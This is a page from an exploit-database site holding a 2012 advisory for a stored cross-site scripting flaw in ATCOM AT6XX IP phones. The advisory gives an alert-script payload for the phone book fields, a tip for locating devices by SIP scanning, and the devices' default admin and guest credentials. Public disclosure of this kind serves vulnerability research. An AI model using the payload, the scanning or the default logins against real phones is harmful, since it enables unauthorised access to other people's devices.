0day.today - Biggest Exploit Database in the World.
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn
GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Contact us
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
IP phone AT6XX Cross Site Scripting Vulnerability
[==================================
IP phone AT6XX Cross Site Scripting
==================================
=======================================================
# Exploit Title: [IP phone AT6XX Cross Site Scripting ]
# Date: 27/05/2012
# Author: cheki
# Vendor: http://www.atcom.cn/
# Version: AT6XX models
# Category:: webapps
# Tested on: linux
# Contact: anonymous17hacker@gmail.com
======================================================
=====================================================
# Vulnerabilities #
Go to System Manage>Phone Book and Add Phone Book and insert [Label==>Name && Label==>Namber]
"<script>alert("XSS");</script>" and click Add.
now you will get Cross Site Scripting error.
HTTP/1.1 200 OK
Server: Rapid Logic/1.1
MIME-version: 1.0
Date: Thu Jan 1 10:21:44 1970 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Set-Cookie: auth=6dea7758000091b8; path=/
# use: svmap and scan ip or a range
| SIP Device | User Agent | Fingerprint |
--------------------------------------------------
| 192.169.0.3:5060 | unknown | disabled |
# demo: Remember the account is admin/admin
for administrator and guest/guest for user.
=====================================================
=====================================================
About ATCOM
ATCOM is the leading VoIP hardware manufacturer in global market. We have been keeping innovating with customer’s needs oriented , working with partners to establish a total solution for SMB VoIP with IP phone , IP PBX and Asterisk cards
With over 10 years’ experience of R&D , manufacturing and service in network and VoIP filed ; mission of creating the biggest value for IP terminals , we commit ourselves in supplying the competitive IP phone and other terminals for IP PBX , softswitch , IMS , NGN providers and carriers; supplying the competitive total VoIP solution for SMB market. We keep improving the customer’s experience and creating the bigger value with our reliable products. Until now , our VoIP products has been sold to over 60 countries and used by millions of end users.
For the R&D , we keep on investing the capital , partner with best technology companies all over the world. We have our own software Intellectual property rights and over 20 patents. We are devoted to provide better products and service for our customer with mission of becoming the best VoIP terminal manufacturer and principle of innovative hard working.
=====================================================
[-] Greetz to 1337day.com Team hacking.ge Team and Anuka bolqvadze
# 0day.today [2024-07-02] #